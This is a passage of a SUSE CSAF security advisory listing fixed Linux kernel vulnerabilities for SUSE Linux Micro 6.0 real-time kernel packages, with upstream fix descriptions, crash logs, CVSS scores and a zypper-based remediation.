"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-71199"
},
{
"cve": "CVE-2025-71200",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71200"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmmc: sdhci-of-dwcmshc: Prevent illegal clock reduction in HS200/HS400 mode\n\nWhen operating in HS200 or HS400 timing modes, reducing the clock frequency\nbelow 52MHz will lead to link broken as the Rockchip DWC MSHC controller\nrequires maintaining a minimum clock of 52MHz in these modes.\n\nAdd a check to prevent illegal clock reduction through debugfs:\n\nroot@debian:/# echo 50000000 \u003e /sys/kernel/debug/mmc0/clock\nroot@debian:/# [ 30.090146] mmc0: running CQE recovery\nmmc0: cqhci: Failed to halt\nmmc0: cqhci: spurious TCN for tag 0\nWARNING: drivers/mmc/host/cqhci-core.c:797 at cqhci_irq+0x254/0x818, CPU#1: kworker/1:0H/24\nModules linked in:\nCPU: 1 UID: 0 PID: 24 Comm: kworker/1:0H Not tainted 6.19.0-rc1-00001-g09db0998649d-dirty #204 PREEMPT\nHardware name: Rockchip RK3588 EVB1 V10 Board (DT)\nWorkqueue: kblockd blk_mq_run_work_fn\npstate: 604000c9 (nZCv daIF +PAN -UAO -TCO -DIT -SSBS BTYPE=--)\npc : cqhci_irq+0x254/0x818\nlr : cqhci_irq+0x254/0x818\n...",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71200",
"url": "https://www.suse.com/security/cve/CVE-2025-71200"
},
{
"category": "external",
"summary": "SUSE Bug 1258222 for CVE-2025-71200",
"url": "https://bugzilla.suse.com/1258222"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-71200"
},
{
"cve": "CVE-2025-71222",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71222"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: wlcore: ensure skb headroom before skb_push\n\nThis avoids occasional skb_under_panic Oops from wl1271_tx_work. In this case, headroom is\nless than needed (typically 110 - 94 = 16 bytes).",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71222",
"url": "https://www.suse.com/security/cve/CVE-2025-71222"
},
{
"category": "external",
"summary": "SUSE Bug 1258279 for CVE-2025-71222",
"url": "https://bugzilla.suse.com/1258279"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-71222"
},
{
"cve": "CVE-2025-71224",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71224"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: mac80211: ocb: skip rx_no_sta when interface is not joined\n\nieee80211_ocb_rx_no_sta() assumes a valid channel context, which is only\npresent after JOIN_OCB.\n\nRX may run before JOIN_OCB is executed, in which case the OCB interface\nis not operational. Skip RX peer handling when the interface is not\njoined to avoid warnings in the RX path.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71224",
"url": "https://www.suse.com/security/cve/CVE-2025-71224"
},
{
"category": "external",
"summary": "SUSE Bug 1258824 for CVE-2025-71224",
"url": "https://bugzilla.suse.com/1258824"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-71224"
},
{
"cve": "CVE-2025-71225",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71225"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmd: suspend array while updating raid_disks via sysfs\n\nIn raid1_reshape(), freeze_array() is called before modifying the r1bio\nmemory pool (conf-\u003er1bio_pool) and conf-\u003eraid_disks, and\nunfreeze_array() is called after the update is completed.\n\nHowever, freeze_array() only waits until nr_sync_pending and\n(nr_pending - nr_queued) of all buckets reaches zero. When an I/O error\noccurs, nr_queued is increased and the corresponding r1bio is queued to\neither retry_list or bio_end_io_list. As a result, freeze_array() may\nunblock before these r1bios are released.\n\nThis can lead to a situation where conf-\u003eraid_disks and the mempool have\nalready been updated while queued r1bios, allocated with the old\nraid_disks value, are later released. Consequently, free_r1bio() may\naccess memory out of bounds in put_all_bios() and release r1bios of the\nwrong size to the new mempool, potentially causing issues with the\nmempool as well.\n\nSince only normal I/O might increase nr_queued while an I/O error occurs,\nsuspending the array avoids this issue.\n\nNote: Updating raid_disks via ioctl SET_ARRAY_INFO already suspends\nthe array. Therefore, we suspend the array when updating raid_disks\nvia sysfs to avoid this issue too.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71225",
"url": "https://www.suse.com/security/cve/CVE-2025-71225"
},
{
"category": "external",
"summary": "SUSE Bug 1258411 for CVE-2025-71225",
"url": "https://bugzilla.suse.com/1258411"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-71225"
},
{
"cve": "CVE-2025-71229",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71229"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: rtw88: Fix alignment fault in rtw_core_enable_beacon()\n\nrtw_core_enable_beacon() reads 4 bytes from an address that is not a\nmultiple of 4. This results in a crash on some systems.\n\nDo 1 byte reads/writes instead.\n\nUnable to handle kernel paging request at virtual address ffff8000827e0522\nMem abort info:\n ESR = 0x0000000096000021\n EC = 0x25: DABT (current EL), IL = 32 bits\n SET = 0, FnV = 0\n EA = 0, S1PTW = 0\n FSC = 0x21: alignment fault\nData abort info:\n ISV = 0, ISS = 0x00000021, ISS2 = 0x00000000\n CM = 0, WnR = 0, TnD = 0, TagAccess = 0\n GCS = 0, Overlay = 0, DirtyBit = 0, Xs = 0\nswapper pgtable: 4k pages, 48-bit VAs, pgdp=0000000005492000\n[ffff8000827e0522] pgd=0000000000000000, p4d=10000001021d9403, pud=10000001021da403, pmd=100000011061c403, pte=00780000f3200f13\nInternal error: Oops: 0000000096000021 [#1] SMP\nModules linked in: [...] rtw88_8822ce rtw88_8822c rtw88_pci rtw88_core [...]\nCPU: 0 UID: 0 PID: 73 Comm: kworker/u32:2 Tainted: G W 6.17.9 #1-NixOS VOLUNTARY\nTainted: [W]=WARN\nHardware name: FriendlyElec NanoPC-T6 LTS (DT)\nWorkqueue: phy0 rtw_c2h_work [rtw88_core]\npstate: 60400009 (nZCv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--)\npc : rtw_pci_read32+0x18/0x40 [rtw88_pci]\nlr : rtw_core_enable_beacon+0xe0/0x148 [rtw88_core]\nsp : ffff800080cc3ca0\nx29: ffff800080cc3ca0 x28: ffff0001031fc240 x27: ffff000102100828\nx26: ffffd2cb7c9b4088 x25: ffff0001031fc2c0 x24: ffff000112fdef00\nx23: ffff000112fdef18 x22: ffff000111c29970 x21: 0000000000000001\nx20: 0000000000000001 x19: ffff000111c22040 x18: 0000000000000000\nx17: 0000000000000000 x16: 0000000000000000 x15: 0000000000000000\nx14: 0000000000000000 x13: 0000000000000000 x12: 0000000000000000\nx11: 0000000000000000 x10: 0000000000000000 x9 : ffffd2cb6507c090\nx8 : 0000000000000000 x7 : 0000000000000000 x6 : 0000000000000000\nx5 : 0000000000000000 x4 : 0000000000000000 x3 : 0000000000000000\nx2 : 0000000000007f10 x1 : 0000000000000522 x0 : ffff8000827e0522\nCall trace:\n rtw_pci_read32+0x18/0x40 [rtw88_pci] (P)\n rtw_hw_scan_chan_switch+0x124/0x1a8 [rtw88_core]\n rtw_fw_c2h_cmd_handle+0x254/0x290 [rtw88_core]\n rtw_c2h_work+0x50/0x98 [rtw88_core]\n process_one_work+0x178/0x3f8\n worker_thread+0x208/0x418\n kthread+0x120/0x220\n ret_from_fork+0x10/0x20\nCode: d28fe202 8b020000 f9524400 8b214000 (b9400000)\n---[ end trace 0000000000000000 ]---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71229",
"url": "https://www.suse.com/security/cve/CVE-2025-71229"
},
{
"category": "external",
"summary": "SUSE Bug 1258415 for CVE-2025-71229",
"url": "https://bugzilla.suse.com/1258415"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-71229"
},
{
"cve": "CVE-2025-71231",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71231"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncrypto: iaa - Fix out-of-bounds index in find_empty_iaa_compression_mode\n\nThe local variable \u0027i\u0027 is initialized with -EINVAL, but the for loop\nimmediately overwrites it and -EINVAL is never returned.\n\nIf no empty compression mode can be found, the function would return the\nout-of-bounds index IAA_COMP_MODES_MAX, which would cause an invalid\narray access in add_iaa_compression_mode().\n\nFix both issues by returning either a valid index or -EINVAL.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71231",
"url": "https://www.suse.com/security/cve/CVE-2025-71231"
},
{
"category": "external",
"summary": "SUSE Bug 1258424 for CVE-2025-71231",
"url": "https://bugzilla.suse.com/1258424"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "important"
}
],
"title": "CVE-2025-71231"
},
{
"cve": "CVE-2025-71232",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71232"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: qla2xxx: Free sp in error path to fix system crash\n\nSystem crash seen during load/unload test in a loop,\n\n[61110.449331] qla2xxx [0000:27:00.0]-0042:0: Disabled MSI-X.\n[61110.467494] =============================================================================\n[61110.467498] BUG qla2xxx_srbs (Tainted: G OE -------- --- ): Objects remaining in qla2xxx_srbs on __kmem_cache_shutdown()\n[61110.467501] -----------------------------------------------------------------------------\n\n[61110.467502] Slab 0x000000000ffc8162 objects=51 used=1 fp=0x00000000e25d3d85 flags=0x57ffffc0010200(slab|head|node=1|zone=2|lastcpupid=0x1fffff)\n[61110.467509] CPU: 53 PID: 455206 Comm: rmmod Kdump: loaded Tainted: G OE -------- --- 5.14.0-284.11.1.el9_2.x86_64 #1\n[61110.467513] Hardware name: HPE ProLiant DL385 Gen10 Plus v2/ProLiant DL385 Gen10 Plus v2, BIOS A42 08/17/2023\n[61110.467515] Call Trace:\n[61110.467516] \u003cTASK\u003e\n[61110.467519] dump_stack_lvl+0x34/0x48\n[61110.467526] slab_err.cold+0x53/0x67\n[61110.467534] __kmem_cache_shutdown+0x16e/0x320\n[61110.467540] kmem_cache_destroy+0x51/0x160\n[61110.467544] qla2x00_module_exit+0x93/0x99 [qla2xxx]\n[61110.467607] ? __do_sys_delete_module.constprop.0+0x178/0x280\n[61110.467613] ? syscall_trace_enter.constprop.0+0x145/0x1d0\n[61110.467616] ? do_syscall_64+0x5c/0x90\n[61110.467619] ? exc_page_fault+0x62/0x150\n[61110.467622] ? entry_SYSCALL_64_after_hwframe+0x63/0xcd\n[61110.467626] \u003c/TASK\u003e\n[61110.467627] Disabling lock debugging due to kernel taint\n[61110.467635] Object 0x0000000026f7e6e6 @offset=16000\n[61110.467639] ------------[ cut here ]------------\n[61110.467639] kmem_cache_destroy qla2xxx_srbs: Slab cache still has objects when called from qla2x00_module_exit+0x93/0x99 [qla2xxx]\n[61110.467659] WARNING: CPU: 53 PID: 455206 at mm/slab_common.c:520 kmem_cache_destroy+0x14d/0x160\n[61110.467718] CPU: 53 PID: 455206 Comm: rmmod Kdump: loaded Tainted: G B OE -------- --- 5.14.0-284.11.1.el9_2.x86_64 #1\n[61110.467720] Hardware name: HPE ProLiant DL385 Gen10 Plus v2/ProLiant DL385 Gen10 Plus v2, BIOS A42 08/17/2023\n[61110.467721] RIP: 0010:kmem_cache_destroy+0x14d/0x160\n[61110.467724] Code: 99 7d 07 00 48 89 ef e8 e1 6a 07 00 eb b3 48 8b 55 60 48 8b 4c 24 20 48 c7 c6 70 fc 66 90 48 c7 c7 f8 ef a1 90 e8 e1 ed 7c 00 \u003c0f\u003e 0b eb 93 c3 cc cc cc cc 66 2e 0f 1f 84 00 00 00 00 00 55 48 89\n[61110.467725] RSP: 0018:ffffa304e489fe80 EFLAGS: 00010282\n[61110.467727] RAX: 0000000000000000 RBX: ffffffffc0d9a860 RCX: 0000000000000027\n[61110.467729] RDX: ffff8fd5ff9598a8 RSI: 0000000000000001 RDI: ffff8fd5ff9598a0\n[61110.467730] RBP: ffff8fb6aaf78700 R08: 0000000000000000 R09: 0000000100d863b7\n[61110.467731] R10: ffffa304e489fd20 R11: ffffffff913bef48 R12: 0000000040002000\n[61110.467731] R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000\n[61110.467733] FS: 00007f64c89fb740(0000) GS:ffff8fd5ff940000(0000) knlGS:0000000000000000\n[61110.467734] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[61110.467735] CR2: 00007f0f02bfe000 CR3: 00000020ad6dc005 CR4: 0000000000770ee0\n[61110.467736] PKRU: 55555554\n[61110.467737] Call Trace:\n[61110.467738] \u003cTASK\u003e\n[61110.467739] qla2x00_module_exit+0x93/0x99 [qla2xxx]\n[61110.467755] ? __do_sys_delete_module.constprop.0+0x178/0x280\n\nFree sp in the error path to fix the crash.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71232",
"url": "https://www.suse.com/security/cve/CVE-2025-71232"
},
{
"category": "external",
"summary": "SUSE Bug 1258422 for CVE-2025-71232",
"url": "https://bugzilla.suse.com/1258422"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-71232"
},
{
"cve": "CVE-2025-71234",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71234"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: rtl8xxxu: fix slab-out-of-bounds in rtl8xxxu_sta_add\n\nThe driver does not set hw-\u003esta_data_size, which causes mac80211 to\nallocate insufficient space for driver private station data in\n__sta_info_alloc(). When rtl8xxxu_sta_add() accesses members of\nstruct rtl8xxxu_sta_info through sta-\u003edrv_priv, this results in a\nslab-out-of-bounds write.\n\nKASAN report on RISC-V (VisionFive 2) with RTL8192EU adapter:\n\n BUG: KASAN: slab-out-of-bounds in rtl8xxxu_sta_add+0x31c/0x346\n Write of size 8 at addr ffffffd6d3e9ae88 by task kworker/u16:0/12\n\nSet hw-\u003esta_data_size to sizeof(struct rtl8xxxu_sta_info) during\nprobe, similar to how hw-\u003evif_data_size is configured. This ensures\nmac80211 allocates sufficient space for the driver\u0027s per-station\nprivate data.\n\nTested on StarFive VisionFive 2 v1.2A board.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71234",
"url": "https://www.suse.com/security/cve/CVE-2025-71234"
},
{
"category": "external",
"summary": "SUSE Bug 1258419 for CVE-2025-71234",
"url": "https://bugzilla.suse.com/1258419"
},
{
"category": "external",
"summary": "SUSE Bug 1258420 for CVE-2025-71234",
"url": "https://bugzilla.suse.com/1258420"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "important"
}
],
"title": "CVE-2025-71234"
},
{
"cve": "CVE-2025-71235",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71235"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: qla2xxx: Delay module unload while fabric scan in progress\n\nSystem crash seen during load/unload test in a loop.\n\n[105954.384919] RBP: ffff914589838dc0 R08: 0000000000000000 R09: 0000000000000086\n[105954.384920] R10: 000000000000000f R11: ffffa31240904be5 R12: ffff914605f868e0\n[105954.384921] R13: ffff914605f86910 R14: 0000000000008010 R15: 00000000ddb7c000\n[105954.384923] FS: 0000000000000000(0000) GS:ffff9163fec40000(0000) knlGS:0000000000000000\n[105954.384925] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[105954.384926] CR2: 000055d31ce1d6a0 CR3: 0000000119f5e001 CR4: 0000000000770ee0\n[105954.384928] PKRU: 55555554\n[105954.384929] Call Trace:\n[105954.384931] \u003cIRQ\u003e\n[105954.384934] qla24xx_sp_unmap+0x1f3/0x2a0 [qla2xxx]\n[105954.384962] ? qla_async_scan_sp_done+0x114/0x1f0 [qla2xxx]\n[105954.384980] ? qla24xx_els_ct_entry+0x4de/0x760 [qla2xxx]\n[105954.384999] ? __wake_up_common+0x80/0x190\n[105954.385004] ? qla24xx_process_response_queue+0xc2/0xaa0 [qla2xxx]\n[105954.385023] ? qla24xx_msix_rsp_q+0x44/0xb0 [qla2xxx]\n[105954.385040] ? __handle_irq_event_percpu+0x3d/0x190\n[105954.385044] ? handle_irq_event+0x58/0xb0\n[105954.385046] ? handle_edge_irq+0x93/0x240\n[105954.385050] ? __common_interrupt+0x41/0xa0\n[105954.385055] ? common_interrupt+0x3e/0xa0\n[105954.385060] ? asm_common_interrupt+0x22/0x40\n\nThe root cause of this was that there was a free (dma_free_attrs) in the\ninterrupt context. There was a device discovery/fabric scan in\nprogress. A module unload was issued which set the UNLOADING flag. As\npart of the discovery, after receiving an interrupt a work queue was\nscheduled (which involved a work to be queued). Since the UNLOADING\nflag is set, the work item was not allocated and the mapped memory had\nto be freed. The free occurred in interrupt context leading to system\ncrash. Delay the driver unload until the fabric scan is complete to\navoid the crash.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
